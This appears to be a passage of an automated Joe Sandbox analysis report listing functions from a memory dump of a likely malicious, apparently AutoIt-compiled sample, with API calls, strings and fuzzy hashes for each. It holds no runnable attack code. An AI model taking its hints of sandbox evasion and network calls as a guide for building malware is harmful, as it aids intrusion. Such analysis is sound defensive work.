                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                • String ID: LPT
                                                                                                                                • API String ID: 3222508074-1350329615
                                                                                                                                • Opcode ID: 2b14170ef879187fa624341e8fd055bda652eabecf3ffd0624bafc0fae48fb88
                                                                                                                                • Instruction ID: ba1ee6ee428242670671b6d9f868952266998f6be0d47ac582ea02e084bf6ad1
                                                                                                                                • Opcode Fuzzy Hash: 2b14170ef879187fa624341e8fd055bda652eabecf3ffd0624bafc0fae48fb88
                                                                                                                                • Instruction Fuzzy Hash: F761A375E00215AFCB18DF54C991EEEB7B4EF48311F104069FA56AB291DB34AF88EB50
                                                                                                                                Function 00F11B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00F11B83
                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00F11B9C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                • Opcode ID: 2000bc03ddd36c67bd2dac001e31dbe14ff26a0829ae06982bb4e10bc3635815
                                                                                                                                • Instruction ID: ab5ac38c024583369252453807d20d5414c936cc549e3032154c78e9e65e10d1
                                                                                                                                • Opcode Fuzzy Hash: 2000bc03ddd36c67bd2dac001e31dbe14ff26a0829ae06982bb4e10bc3635815
                                                                                                                                • Instruction Fuzzy Hash: 5A514971408748ABE360AF14EC86BABBBE8FF94354F51484DF1C8420A5EB75896C9763
                                                                                                                                Function 00F5CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1417D: __fread_nolock.LIBCMT ref: 00F1419B
                                                                                                                                • _wcscmp.LIBCMT ref: 00F5CF49
                                                                                                                                • _wcscmp.LIBCMT ref: 00F5CF5C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                                                                • String ID: FILE
                                                                                                                                • API String ID: 4029003684-3121273764
                                                                                                                                • Opcode ID: 57655d36c7bc25897625b1a2e817cf4f10be81257c2abf3bcdfac7f46548e772
                                                                                                                                • Instruction ID: f35a4677d3101d4bae21196d4d6a7b2082d9e9843ccb8e1c5ce4bac01d4e584f
                                                                                                                                • Opcode Fuzzy Hash: 57655d36c7bc25897625b1a2e817cf4f10be81257c2abf3bcdfac7f46548e772
                                                                                                                                • Instruction Fuzzy Hash: 2441D832A002197EDF11DBA4CC81FEF7BB99F85714F000469F601B7191D775AA8897A5
                                                                                                                                Function 00F7A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F7A668
                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F7A67D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID: '
                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                • Opcode ID: 51d627b11a2f36aeb75069eaead85dd5c488b9f35ee696166e09daf0bec18c55
                                                                                                                                • Instruction ID: d0be856d2d0b08d0f7040b3319d0979e719cfc3a754e20bd5a7dfbc2170c2cea
                                                                                                                                • Opcode Fuzzy Hash: 51d627b11a2f36aeb75069eaead85dd5c488b9f35ee696166e09daf0bec18c55
                                                                                                                                • Instruction Fuzzy Hash: C9410875E01209AFDB14CFA8C880BDE7BB5FB49300F15406AE919EB381D770A941EFA1
                                                                                                                                Function 00F657D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F657E7
                                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00F6581D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CrackInternet_memset
                                                                                                                                • String ID: |
                                                                                                                                • API String ID: 1413715105-2343686810
                                                                                                                                • Opcode ID: 9a26abd1f41cb5e5351e03f2349d39afd5dbb0a1d7f53cbd4eda23f67376460d
                                                                                                                                • Instruction ID: 93c988bb954db6597d90d83f735f05212843da409216778904faa8530be1b385
                                                                                                                                • Opcode Fuzzy Hash: 9a26abd1f41cb5e5351e03f2349d39afd5dbb0a1d7f53cbd4eda23f67376460d
                                                                                                                                • Instruction Fuzzy Hash: EB313B71C00119EBCF11AFA0CD95EEEBFB8FF18350F104115F815A6162DB359A8AEBA0
                                                                                                                                Function 00F79567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00F7961B
                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F79657
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$DestroyMove
                                                                                                                                • String ID: static
                                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                                • Opcode ID: b502cbb43093369abe609838754e7963e7ad2ef09f7f4eafa0ecabc4d9964d46
                                                                                                                                • Instruction ID: 778ca8f4e1c37f29c5ff6e64d37007a41bb49df86328fa013221d64b49f2a4ac
                                                                                                                                • Opcode Fuzzy Hash: b502cbb43093369abe609838754e7963e7ad2ef09f7f4eafa0ecabc4d9964d46
                                                                                                                                • Instruction Fuzzy Hash: 2B31BC32500204AEEB109F24DC81FFB77A9FF48760F10861AF8A9C7190CA70AC91EB61
                                                                                                                                Function 00F55B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F55BE4
                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F55C1F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                                • Opcode ID: ad62bd2559565cb04c941c345fd0683bcf1b980569a6d01b4886f8d6eca16214
                                                                                                                                • Instruction ID: 320da7f60bba664256d40190b93939779493cfbb72584e8640d6b9ad2beb7de3
                                                                                                                                • Opcode Fuzzy Hash: ad62bd2559565cb04c941c345fd0683bcf1b980569a6d01b4886f8d6eca16214
                                                                                                                                • Instruction Fuzzy Hash: EB31D732900709EBDB25CFA8C899BADBBF5FF05761F180019EE81965A1E7709948EF10
                                                                                                                                Function 00F66B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __snwprintf.LIBCMT ref: 00F66BDD
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __snwprintf_memmove
                                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                • API String ID: 3506404897-2584243854
                                                                                                                                • Opcode ID: ef8782672a3f812c7aef3a9cc8081e61e2db4f36bfd236f893731412908ab14c
                                                                                                                                • Instruction ID: a8d4a7fa4f5d2ae10915ffefdb72b6524415b5254e6bea6a7b9dc8c06e1ccb43
                                                                                                                                • Opcode Fuzzy Hash: ef8782672a3f812c7aef3a9cc8081e61e2db4f36bfd236f893731412908ab14c
                                                                                                                                • Instruction Fuzzy Hash: E3218F31600519AACF00EFA4CD82EED77B5EF45700F404469F505EB142DB78EA95EBA2
                                                                                                                                Function 00F791DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F79269
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F79274
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID: Combobox
                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                • Opcode ID: 50492a9288b7bdc89baf9353d9c6c63517d54886db9ff64811ac738fa9481117
                                                                                                                                • Instruction ID: d348c78bbcac1f45be938787168551a46287908db23fb744e294ce1fc9642040
                                                                                                                                • Opcode Fuzzy Hash: 50492a9288b7bdc89baf9353d9c6c63517d54886db9ff64811ac738fa9481117
                                                                                                                                • Instruction Fuzzy Hash: E311D371704208BFEF11DF54DC80EAB376AEB883A4F108126F91C97291D6B1DC60EBA1
                                                                                                                                Function 00F7970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F2C657
                                                                                                                                  • Part of subcall function 00F2C619: GetStockObject.GDI32(00000011), ref: 00F2C66B
                                                                                                                                  • Part of subcall function 00F2C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2C675
                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00F79775
                                                                                                                                • GetSysColor.USER32(00000012), ref: 00F7978F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                • String ID: static
                                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                                • Opcode ID: d045dcddf2668d0ac8f413a874c45ef4b2a873f79ecac4373c7f84b7fe129f69
                                                                                                                                • Instruction ID: 00bcdaa2faebc6aa08cae1bf52262c14bcf3adb573f3b2edd1f956f8cf19c6ca
                                                                                                                                • Opcode Fuzzy Hash: d045dcddf2668d0ac8f413a874c45ef4b2a873f79ecac4373c7f84b7fe129f69
                                                                                                                                • Instruction Fuzzy Hash: CE115972520209AFDB04DFB8CC45EEA7BA8FB08314F00452AF959D3240D674E861EB50
                                                                                                                                Function 00F79424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00F794A6
                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F794B5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                • String ID: edit
                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                • Opcode ID: 5d812fb050379e444b0190a4e80b5e8bbdbca7c257f4a884b947115d4749faa2
                                                                                                                                • Instruction ID: fe6d06e747e843a0fe11575c58bf85275dc36bdfeb6523a52fe24cc889fb2a1f
                                                                                                                                • Opcode Fuzzy Hash: 5d812fb050379e444b0190a4e80b5e8bbdbca7c257f4a884b947115d4749faa2
                                                                                                                                • Instruction Fuzzy Hash: E0116071504108AFEB108F64DC40EEB3769EB05374F60C716F969931E0C6B5DC52BB62
                                                                                                                                Function 00F55C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F55CF3
                                                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F55D12
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                                • Opcode ID: 41fc99e4beac9a64973fae62a52bebb726275d5b09330aab820ee22e2f4ef268
                                                                                                                                • Instruction ID: 53e76c65d396376431bd93440f21247c4d16182ed473d1e3a99188e1c441a00f
                                                                                                                                • Opcode Fuzzy Hash: 41fc99e4beac9a64973fae62a52bebb726275d5b09330aab820ee22e2f4ef268
                                                                                                                                • Instruction Fuzzy Hash: B111D373D05618ABDB20DBA8DC58BA977F9AB05B61F190011EE41EB190D370AD08F790
                                                                                                                                Function 00F653F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F6544C
                                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F65475
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Internet$OpenOption
                                                                                                                                • String ID: <local>
                                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                                • Opcode ID: cc645b606402dae185632c5b2d7583772e4c4971dc84f94e367da9a6d8c358ce
                                                                                                                                • Instruction ID: 3970ee349b16e79489b09b0f650a69223becf294119933a501deee909593c606
                                                                                                                                • Opcode Fuzzy Hash: cc645b606402dae185632c5b2d7583772e4c4971dc84f94e367da9a6d8c358ce
                                                                                                                                • Instruction Fuzzy Hash: 9C11E371941A21BACB24CF51CCA4EFBFB68FF12B62F10816AF50562040EB7059C0E6F1
                                                                                                                                Function 00F6ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: htonsinet_addr
                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                                • Opcode ID: 9c1e54040335f56b39b54ee649d5c460725d8b7bdf6cc17f3a87cf11121a7db8
                                                                                                                                • Instruction ID: e4744ba91c29f382340a457b736d800efc909c73b0be07bc0e5575494195c65e
                                                                                                                                • Opcode Fuzzy Hash: 9c1e54040335f56b39b54ee649d5c460725d8b7bdf6cc17f3a87cf11121a7db8
                                                                                                                                • Instruction Fuzzy Hash: E201F535600205ABCB10AFA4CC46FADB364FF54724F20851AFA15AB2D2D776E804EB66
